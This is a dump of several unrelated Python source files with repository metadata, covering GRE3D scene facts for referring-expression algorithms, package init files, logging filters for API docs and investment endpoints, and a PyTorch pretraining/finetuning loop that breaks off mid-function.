2022-02-01T10:05:16.000Z
|
nltk_contrib/refexpr/gre3d_facts.py
|
silky/nltk_contrib
|
c152bde901f05915e90b07a615b232adb123bed8
|
[
"Apache-2.0"
] | 12
|
2015-01-13T06:27:18.000Z
|
2020-07-30T23:00:41.000Z
|
nltk_contrib/refexpr/gre3d_facts.py
|
silky/nltk_contrib
|
c152bde901f05915e90b07a615b232adb123bed8
|
[
"Apache-2.0"
] | 114
|
2015-01-13T04:47:49.000Z
|
2021-11-13T08:16:02.000Z
|
from full_brevity import *
from incremental import *
from relational import *
import util
def getFacts():
"""
Always numbered from left to right
Referent is alwasy r1
Distractors are labeled based on the first letter of their type
s1 = first sphere, c1= first cube, s2 = second sphere etc.
This data was entered manually, but came from analyzing the
the pictures from the GRE3D data set provided by Viethen and Dale 2008.
"""
facts = {}
facts[1] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
["color", "green", "r1"], ["color", "blue", "c1"], ["color", "blue", "c2"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "large", "c1"],["size", "large", "c2"],
[Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
[Rel, "left_of", "c1", "r1"], [Rel, "right_of", "r1", "c1"],
["side", "right", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
[Rel, "on", "r1", "c2"], [Rel, "on", "c2", "f1"], [Rel, "on", "c1", "f1"],
[Rel, "under", "f1", "c2"], [Rel, "under", "f1", "c1"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[2] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
["color", "red", "r1"], ["color", "yellow", "c1"], ["color", "red", "c2"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "large", "c1"],["size", "small", "c2"],
[Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
[Rel, "left_of", "r1", "c2"], [Rel, "right_of", "c2", "r1"],
["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
[Rel, "in_front_of", "r1", "c1"], [Rel, "behind", "c1", "r1"],
[Rel, "on", "r1", "f1"], [Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
[Rel, "under", "f1", "r1"], [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[3] = [[Type, "sphere", "r1"], [Type, "sphere", "s1"], [Type, "cube", "c1"],
["color", "blue", "r1"], ["color", "blue", "s1"], ["color", "green", "c1"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "large", "s1"],["size", "large", "c1"],
[Rel, "left_of", "s1", "c1"], [Rel, "right_of", "c1", "s1"],
[Rel, "left_of", "s1", "r1"], [Rel, "right_of", "r1", "s1"],
["side", "right", "r1"], ["side", "left", "s1" ], ["side", "right", "c1" ],
[Rel, "on", "r1", "c1"], [Rel, "under", "c1", "r1"],
[Rel, "on", "c1", "f1"], [Rel, "on", "s1", "f1"],
[Rel, "under", "f1", "c1"], [Rel, "under", "f1", "s1"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[4] = [[Type, "cube", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
["color", "yellow", "r1"], ["color", "yellow", "c1"], ["color", "red", "c2"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "large", "c1"],["size", "small", "c2"],
[Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
[Rel, "left_of", "r1", "c2"], [Rel, "right_of", "c2", "r1"],
["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
[Rel, "in_front_of", "r1", "c1"], [Rel, "behind", "c1", "r1"],
[Rel, "on", "r1", "f1"], [Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
[Rel, "under", "f1", "r1"], [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[5] = [[Type, "cube", "r1"], [Type, "sphere", "s1"], [Type, "cube", "c1"],
["color", "blue", "r1"], ["color", "blue", "s1"], ["color", "green", "c1"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "large", "s1"],["size", "small", "c1"],
[Rel, "left_of", "s1", "c1"], [Rel, "right_of", "c1", "s1"],
[Rel, "left_of", "s1", "r1"], [Rel, "right_of", "r1", "s1"],
["side", "right", "r1"], ["side", "left", "s1" ], ["side", "right", "c1" ],
[Rel, "on", "r1", "c1"], [Rel, "under", "c1", "r1"],
[Rel, "on", "s1", "f1"], [Rel, "on", "c1", "f1"],
[Rel, "under", "f1", "s1"], [Rel, "under", "f1", "c1"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[6] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
["color", "green", "r1"], ["color", "blue", "c1"], ["color", "blue", "c2"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "large", "c1"],["size", "large", "c2"],
[Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
[Rel, "left_of", "r1", "c2"], [Rel, "right_of", "r1", "c1"],
["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
[Rel, "in_front_of", "r1", "c1"], [Rel, "behind", "c1", "r1"],
[Rel, "on", "r1", "f1"],[Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
[Rel, "under", "f1", "r1"],[Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[7] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
["color", "yellow", "r1"], ["color", "yellow", "c1"], ["color", "red", "c2"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "small", "c1"],["size", "large", "c2"],
[Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
[Rel, "left_of", "c1", "r1"], [Rel, "right_of", "r1", "c1"],
["side", "right", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
[Rel, "on", "r1", "c2"], [Rel, "under", "c2", "r1"],
[Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
[Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[8] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "sphere", "s1"],
["color", "blue", "r1"], ["color", "green", "c1"], ["color", "blue", "s1"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "large", "c1"],["size", "large", "s1"],
[Rel, "left_of", "c1", "s1"], [Rel, "right_of", "s1", "c1"],
[Rel, "left_of", "r1", "s1"], [Rel, "right_of", "s1", "r1"],
["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "s1" ],
[Rel, "in_front_of", "r1", "c1"], [Rel, "behind", "c1", "r1"],
[Rel, "on", "r1", "f1"], [Rel, "on", "c1", "f1"], [Rel, "on", "s1", "f1"],
[Rel, "under", "f1", "r1"], [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "s1"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[9] = [[Type, "cube", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
["color", "red", "r1"], ["color", "yellow", "c1"], ["color", "red", "c2"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "small", "c1"],["size", "large", "c2"],
[Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
[Rel, "left_of", "c1", "r1"], [Rel, "right_of", "r1", "c1"],
["side", "right", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
[Rel, "on", "r1", "c2"], [Rel, "under", "c2", "r1"],
[Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
[Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[10] = [[Type, "cube", "r1"], [Type, "cube", "c1"], [Type, "sphere", "s1"],
["color", "blue", "r1"], ["color", "green", "c1"], ["color", "blue", "s1"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "small", "c1"],["size", "large", "s1"],
[Rel, "left_of", "c1", "s1"], [Rel, "right_of", "s1", "c1"],
[Rel, "left_of", "r1", "s1"], [Rel, "right_of", "s1", "r1"],
["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "s1" ],
[Rel, "in_front_of", "r1", "c1"], [Rel, "behind", "c1", "r1"],
[Rel, "on", "r1", "f1"], [Rel, "on", "c1", "f1"], [Rel, "on", "s1", "f1"],
[Rel, "under", "f1", "r1"], [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "s1"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[11] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
["color", "yellow", "r1"], ["color", "red", "c1"], ["color", "red", "c2"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "large", "c1"],["size", "large", "c2"],
[Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
[Rel, "left_of", "r1", "c2"], [Rel, "right_of", "c2", "r1"],
["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
[Rel, "on", "r1", "c1"], [Rel, "on", "c2", "f1"], [Rel, "on", "c1", "f1"],
[Rel, "under", "c1", "r1"], [Rel, "under", "f1", "c2"], [Rel, "under", "f1", "c1"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[12] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
["color", "blue", "r1"], ["color", "blue", "c1"], ["color", "green", "c2"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "small", "c1"],["size", "large", "c2"],
[Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
[Rel, "left_of", "c1", "r1"], [Rel, "right_of", "r1", "c1"],
["side", "right", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
[Rel, "in_front_of", "r1", "c2"], [Rel, "behind", "c2", "r1"],
[Rel, "on", "r1", "f1"], [Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
[Rel, "under", "f1", "r1"], [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[13] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "sphere", "s1"],
["color", "red", "r1"], ["color", "yellow", "c1"], ["color", "red", "s1"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "large", "c1"],["size", "large", "s1"],
[Rel, "left_of", "c1", "s1"], [Rel, "right_of", "s1", "c1"],
[Rel, "left_of", "r1", "s1"], [Rel, "right_of", "s1", "r1"],
["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "s1" ],
[Rel, "on", "r1", "c1"], [Rel, "under", "c1", "r1"],
[Rel, "on", "c1", "f1"], [Rel, "on", "s1", "f1"],
[Rel, "under", "f1", "c1"], [Rel, "under", "f1", "s1"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[14] = [[Type, "cube", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
["color", "green", "r1"], ["color", "blue", "c1"], ["color", "green", "c2"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "large", "c2"],["size", "small", "c1"],
[Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
[Rel, "left_of", "c1", "r1"], [Rel, "right_of", "r1", "c2"],
["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
[Rel, "in_front_of", "r1", "c2"], [Rel, "behind", "c2", "r1"],
[Rel, "on", "r1", "f1"], [Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
[Rel, "under", "f1", "r1"], [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[15] = [[Type, "cube", "r1"], [Type, "cube", "c1"], [Type, "sphere", "s1"],
["color", "yellow", "r1"], ["color", "red", "c1"], ["color", "yellow", "s1"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "small", "c1"], ["size", "large", "s1"],
[Rel, "right_of", "s1", "c1"], [Rel, "left_of", "c1", "s1"],
[Rel, "right_of", "s1", "r1"], [Rel, "left_of", "r1", "s1"],
["side", "left", "r1"], ["side", "right", "s1" ], ["side", "left", "c1" ],
[Rel, "on", "r1", "c1"], [Rel, "under", "c1", "r1"],
[Rel, "on", "s1", "f1"], [Rel, "on", "c1", "f1"],
[Rel, "under", "f1", "s1"], [Rel, "under", "f1", "c1"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[16] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
["color", "red", "r1"], ["color", "yellow", "c1"], ["color", "yellow", "c2"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "large", "c1"],["size", "large", "c2"],
[Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
[Rel, "right_of", "r1", "c1"], [Rel, "left_of", "c1", "r1"],
["side", "right", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
[Rel, "in_front_of", "r1", "c2"], [Rel, "behind", "c2", "r1"],
[Rel, "on", "r1", "f1"],[Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
[Rel, "under", "f1", "r1"],[Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[17] = [[Type, "sphere", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
["color", "blue", "r1"], ["color", "green", "c1"], ["color", "blue", "c2"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "large", "c1"],["size", "small", "c2"],
[Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
[Rel, "left_of", "r1", "c2"], [Rel, "right_of", "c2", "r1"],
["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
[Rel, "on", "r1", "c1"], [Rel, "under", "c1", "r1"],
[Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
[Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[18] = [[Type, "sphere", "r1"], [Type, "sphere", "s1"], [Type, "cube", "c1"],
["color", "red", "r1"], ["color", "red", "s1"], ["color", "yellow", "c1"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "large", "s1"],["size", "large", "c1"],
[Rel, "right_of", "c1", "s1"], [Rel, "left_of", "s1", "c1"],
[Rel, "right_of", "r1", "s1"], [Rel, "left_of", "s1", "r1"],
["side", "right", "r1"], ["side", "left", "c1" ], ["side", "right", "s1" ],
[Rel, "in_front_of", "r1", "c1"], [Rel, "behind", "c1", "r1"],
[Rel, "on", "r1", "f1"], [Rel, "on", "c1", "f1"], [Rel, "on", "s1", "f1"],
[Rel, "under", "f1", "r1"], [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "s1"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[19] = [[Type, "cube", "r1"], [Type, "cube", "c1"], [Type, "cube", "c2"],
["color", "green", "r1"], ["color", "green", "c1"], ["color", "blue", "c2"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "large", "c1"],["size", "small", "c2"],
[Rel, "left_of", "c1", "c2"], [Rel, "right_of", "c2", "c1"],
[Rel, "left_of", "r1", "c2"], [Rel, "right_of", "c2", "r1"],
["side", "left", "r1"], ["side", "left", "c1" ], ["side", "right", "c2" ],
[Rel, "on", "r1", "c1"], [Rel, "under", "c1", "r1"],
[Rel, "on", "c1", "f1"], [Rel, "on", "c2", "f1"],
[Rel, "under", "f1", "c1"], [Rel, "under", "f1", "c2"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
facts[20] = [[Type, "cube", "r1"], [Type, "sphere", "s1"], [Type, "cube", "c1"],
["color", "red", "r1"], ["color", "red", "s1"], ["color", "yellow", "c1"],
[Type, "floor", "f1"],
["size", "small", "r1"], ["size", "small", "c1"],["size", "large", "s1"],
[Rel, "left_of", "s1", "c1"], [Rel, "right_of", "c1", "s1"],
[Rel, "left_of", "s1", "r1"], [Rel, "right_of", "r1", "s1"],
["side", "right", "r1"], ["side", "left", "s1" ], ["side", "right", "c1" ],
[Rel, "in_front_of", "r1", "c1"], [Rel, "behind", "c1", "r1"],
[Rel, "on", "r1", "f1"], [Rel, "on", "c1", "f1"], [Rel, "on", "s1", "f1"],
[Rel, "under", "f1", "r1"], [Rel, "under", "f1", "c1"], [Rel, "under", "f1", "s1"],
["color", "None", "f1"], ["size", "None", "f1"], ["side", "None", "f1"]
]
return facts
if __name__ == '__main__':
facts = getFacts()
ranked_attrs = ["color", "size", Type]
taxonomy = Taxonomy({})
handlers = {
"in_front_of": lambda(lr): "in front of",
"left_of": lambda(lr): "to the left of",
"right_of": lambda(lr): "to the right of"
}
#Print out the referring expressions generated by each algorithm for each scene
for i in range(1, 21):
fb = FullBrevity(facts[i])
desc_fb = fb.describe("r1")
incr = Incremental(facts[i], ranked_attrs, taxonomy)
desc_incr = incr.describe("r1")
rel = Relational(facts[i])
desc_rel = rel.describe("r1")
print "%#02d,\"Full Brevity\",\"%s\"" % (i, util.generate_phrase(desc_fb, ranked_attrs))
print "%#02d,\"Incremental\",\"%s\"" % (i, util.generate_phrase(desc_incr, ranked_attrs))
print "%#02d,\"Relational\",\"%s\"" % (i, util.generate_phrase_rel(desc_rel, ranked_attrs, "r1", handlers))
| 63.477273
| 111
| 0.3697
| 2,172
| 19,551
| 3.268877
| 0.05663
| 0.042254
| 0.070423
| 0.034085
| 0.875915
| 0.86493
| 0.851408
| 0.847746
| 0.844085
| 0.834789
| 0
| 0.06015
| 0.310368
| 19,551
| 307
| 112
| 63.684039
| 0.466439
| 0.00399
| 0
| 0.662879
| 0
| 0
| 0.277766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.015152
| null | null | 0.011364
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8e77137070213bccc31d185d7b8863d6141f2657
| 221
|
py
|
Python
|
BrickBreaker/Bricks/__init__.py
|
Urosh91/BrickBreaker
|
527564eb7fbab31e215a60ca8d46843a5a13791b
|
[
"MIT"
] | null | null | null |
BrickBreaker/Bricks/__init__.py
|
Urosh91/BrickBreaker
|
527564eb7fbab31e215a60ca8d46843a5a13791b
|
[
"MIT"
] | null | null | null |
BrickBreaker/Bricks/__init__.py
|
Urosh91/BrickBreaker
|
527564eb7fbab31e215a60ca8d46843a5a13791b
|
[
"MIT"
] | null | null | null |
from BrickBreaker.Bricks.brick import *
from BrickBreaker.Bricks.life_brick import *
from BrickBreaker.Bricks.speed_brick import *
from BrickBreaker.Bricks.size_brick import *
from BrickBreaker.Bricks.ball_brick import *
| 36.833333
| 45
| 0.841629
| 29
| 221
| 6.275862
| 0.310345
| 0.43956
| 0.604396
| 0.593407
| 0.725275
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090498
| 221
| 5
| 46
| 44.2
| 0.905473
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8e80dc7b3123962046c558dcf4af6f336cffaed2
| 396
|
py
|
Python
|
openff/bespokefit/fragmentation/__init__.py
|
openforcefield/bespoke-f
|
27b072bd09610dc8209429118d739e1f453edd61
|
[
"MIT"
] | 12
|
2020-08-28T20:49:00.000Z
|
2021-11-17T08:50:32.000Z
|
openff/bespokefit/fragmentation/__init__.py
|
openforcefield/bespoke-f
|
27b072bd09610dc8209429118d739e1f453edd61
|
[
"MIT"
] | 95
|
2020-02-19T18:40:54.000Z
|
2021-12-02T10:52:23.000Z
|
openff/bespokefit/fragmentation/__init__.py
|
openforcefield/bespoke-f
|
27b072bd09610dc8209429118d739e1f453edd61
|
[
"MIT"
] | 3
|
2021-04-01T04:22:49.000Z
|
2021-04-13T03:19:10.000Z
|
from openff.bespokefit.fragmentation.base import (
FragmentationEngine,
deregister_fragmentation_engine,
get_fragmentation_engine,
list_fragmentation_engines,
register_fragmentation_engine,
)
__all__ = [
"FragmentationEngine",
"deregister_fragmentation_engine",
"get_fragmentation_engine",
"list_fragmentation_engines",
"register_fragmentation_engine",
]
| 24.75
| 50
| 0.777778
| 33
| 396
| 8.727273
| 0.424242
| 0.395833
| 0.291667
| 0.333333
| 0.840278
| 0.840278
| 0.840278
| 0.840278
| 0.840278
| 0.840278
| 0
| 0
| 0.151515
| 396
| 15
| 51
| 26.4
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0.325758
| 0.277778
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
8e84512e3dddac5255d07fee4b7cb177759a1ac3
| 1,600
|
py
|
Python
|
api/filters.py
|
thevickypedia/Jarvis
|
63e15bd6c3d5db3c45bb549cd33ec06fe4a521d9
|
[
"MIT"
] | 59
|
2020-09-08T17:42:09.000Z
|
2022-03-09T07:28:25.000Z
|
api/filters.py
|
thevickypedia/Jarvis
|
63e15bd6c3d5db3c45bb549cd33ec06fe4a521d9
|
[
"MIT"
] | 20
|
2020-10-26T16:10:43.000Z
|
2022-03-23T17:38:38.000Z
|
api/filters.py
|
thevickypedia/Jarvis
|
63e15bd6c3d5db3c45bb549cd33ec06fe4a521d9
|
[
"MIT"
] | 20
|
2020-10-18T00:43:25.000Z
|
2022-03-20T21:04:22.000Z
|
from logging import Filter, LogRecord
class EndpointFilter(Filter):
"""Class to initiate ``/docs`` filter in logs while preserving other access logs.
>>> EndpointFilter
See Also:
- Overrides logging by implementing a subclass of ``logging.Filter``
- The method ``filter(record)``, that examines the log record and returns True to log it or False to discard it.
"""
def filter(self, record: LogRecord) -> bool:
"""Filter out logging at ``/docs`` from log streams.
Args:
record: ``LogRecord`` represents an event which is created every time something is logged.
Returns:
bool:
False flag for the endpoint that needs to be filtered.
"""
return record.getMessage().find("/docs") == -1
class InvestmentFilter(Filter):
"""Class to initiate ``/investment`` filter in logs while preserving other access logs.
>>> InvestmentFilter
See Also:
- Overrides logging by implementing a subclass of ``logging.Filter``
- The method ``filter(record)``, that examines the log record and returns True to log it or False to discard it.
"""
def filter(self, record: LogRecord) -> bool:
"""Filter out logging at ``/investment?token=`` from log streams.
Args:
record: ``LogRecord`` represents an event which is created every time something is logged.
Returns:
bool:
False flag for the endpoint that needs to be filtered.
"""
return record.getMessage().find("/investment?token=") == -1
| 32
| 120
| 0.63375
| 193
| 1,600
| 5.253886
| 0.34715
| 0.059172
| 0.025641
| 0.04142
| 0.804734
| 0.804734
| 0.804734
| 0.804734
| 0.721893
| 0.721893
| 0
| 0.001711
| 0.269375
| 1,600
| 49
| 121
| 32.653061
| 0.865697
| 0.67625
| 0
| 0.285714
| 0
| 0
| 0.064789
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0.142857
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d989723b38dfc838e75aa2f5935823f88a325e88
| 14,377
|
py
|
Python
|
utils/model_methods.py
|
jfcann/va-transformer
|
bbf04612770c95d38915f41045cf9f9acb5dad21
|
[
"MIT"
] | null | null | null |
utils/model_methods.py
|
jfcann/va-transformer
|
bbf04612770c95d38915f41045cf9f9acb5dad21
|
[
"MIT"
] | null | null | null |
utils/model_methods.py
|
jfcann/va-transformer
|
bbf04612770c95d38915f41045cf9f9acb5dad21
|
[
"MIT"
] | null | null | null |
import tqdm
import torch
import torch.nn.functional as F
from sklearn.metrics import accuracy_score, balanced_accuracy_score, roc_auc_score, \
mean_squared_error, r2_score, explained_variance_score
class TQLoss:
def __init__(self, loss, token_loss=None, quant_loss=None):
self.loss = loss
self.token_loss = token_loss
self.quant_loss = quant_loss
class PretrainingMethods:
def __init__(self, model, writer):
self.model = model
clip_value = 0.5
torch.nn.utils.clip_grad_norm_(self.model.parameters(), clip_value)
self.writer = writer
self.depth = model.net.attn_layers.depth
def train(self, train_loader, optimizer, epoch, grad_accum_every=1, gamma=0.5):
self.model.train()
cum_loss = cum_token_loss = cum_quant_loss = 0
for i, X in tqdm.tqdm(enumerate(train_loader), total=len(train_loader),
mininterval=0.5, desc=f'epoch {epoch} training'):
if self.model.with_values:
token_loss, quant_loss = self.model(X)
loss = gamma * token_loss + (1 - gamma) * quant_loss
batch_loss, token_loss, quant_loss = loss.item(), token_loss.item(), quant_loss.item()
self.writer.add_scalar('batch_loss/train', batch_loss, epoch * len(train_loader) + i)
cum_token_loss += token_loss
cum_quant_loss += quant_loss
else:
loss = self.model(X)
token_loss = batch_loss = loss.item()
self.writer.add_scalar('batch_loss/train', batch_loss, epoch * len(train_loader) + i)
cum_token_loss += token_loss
if grad_accum_every > 1:
if i % grad_accum_every <= (grad_accum_every - 1):
loss.backward()
if i % grad_accum_every == (grad_accum_every - 1):
optimizer.step()
optimizer.zero_grad()
else:
loss.backward()
optimizer.step()
optimizer.zero_grad()
cum_loss += batch_loss
epoch_loss = cum_loss / len(train_loader)
epoch_token_loss = cum_token_loss / len(train_loader)
epoch_quant_loss = cum_quant_loss / len(train_loader)
epoch_losses = TQLoss(loss=epoch_loss,
token_loss=epoch_token_loss,
quant_loss=epoch_quant_loss)
self.writer.add_scalar('epoch_loss/train', epoch_loss, epoch)
self.writer.add_scalar('epoch_token_loss/train', epoch_token_loss, epoch)
self.writer.add_scalar('epoch_quantile_loss/train', epoch_quant_loss, epoch)
print(f'epoch avg train losses: '
f'{epoch_loss:.3f}, token: {epoch_token_loss:.3f}, quant: {epoch_quant_loss:.3f}',
f' (gamma={gamma})')
return epoch_losses
@torch.no_grad()
def evaluate(self, val_loader, epoch, gamma=0.5, prefix='val'):
self.model.eval()
cum_loss = cum_token_loss = cum_quant_loss = 0
for i, X in tqdm.tqdm(enumerate(val_loader), total=len(val_loader),
mininterval=0.5, desc=f'epoch {epoch} evaluation'):
if not self.model.with_values:
loss = self.model(X)
token_loss = batch_loss = loss.item()
cum_loss += batch_loss
cum_token_loss += token_loss
else:
token_loss, quant_loss = self.model(X)
loss = gamma * token_loss + (1 - gamma) * quant_loss
cum_loss += loss.item()
cum_token_loss += token_loss.item()
cum_quant_loss += quant_loss.item()
epoch_loss = cum_loss / len(val_loader)
epoch_token_loss = cum_token_loss / len(val_loader)
epoch_quant_loss = cum_quant_loss / len(val_loader)
epoch_losses = TQLoss(loss=epoch_loss,
token_loss=epoch_token_loss,
quant_loss=epoch_quant_loss)
if self.writer is not None:
self.writer.add_scalar(f'epoch_loss/{prefix}', epoch_loss, epoch)
self.writer.add_scalar(f'epoch_token_loss/{prefix}', epoch_token_loss, epoch)
self.writer.add_scalar(f'epoch_quantile_loss/{prefix}', epoch_quant_loss, epoch)
print(f'epoch avg {prefix} losses: '
f'{epoch_loss:.3f}, token: {epoch_token_loss:.3f}, quant: {epoch_quant_loss:.3f}',
f' (gamma={gamma})')
return epoch_losses
@torch.no_grad()
def write_token_emb(self, step, tokens, labeller, seq_len, device):
self.model.eval()
x = torch.tensor(tokens, dtype=torch.int)
z = torch.Tensor().to(device)
for x_part in torch.split(x, seq_len):
x_part = x_part.to(device)
z_part = self.model.net.token_emb(x_part)
z = torch.cat((z, z_part))
metadata = [label for label in map(labeller.token2label, x.cpu().numpy())]
self.writer.add_embedding(z,
metadata=metadata,
global_step=step,
tag='token_embeddings')
class FinetuningMethods:
def __init__(self, model, writer, clf_or_reg='clf'):
self.model = model
self.clf_or_reg = clf_or_reg
clip_value = 0.5
torch.nn.utils.clip_grad_norm_(self.model.parameters(), clip_value)
self.writer = writer
self.depth = model.net.attn_layers.depth
def train(self, train_loader, optimizer, epoch, grad_accum_every=1):
self.model.train()
cum_loss = 0
for i, X in tqdm.tqdm(enumerate(train_loader), total=len(train_loader),
mininterval=0.5, desc=f'epoch {epoch} training'):
loss = self.model(X)
if grad_accum_every > 1:
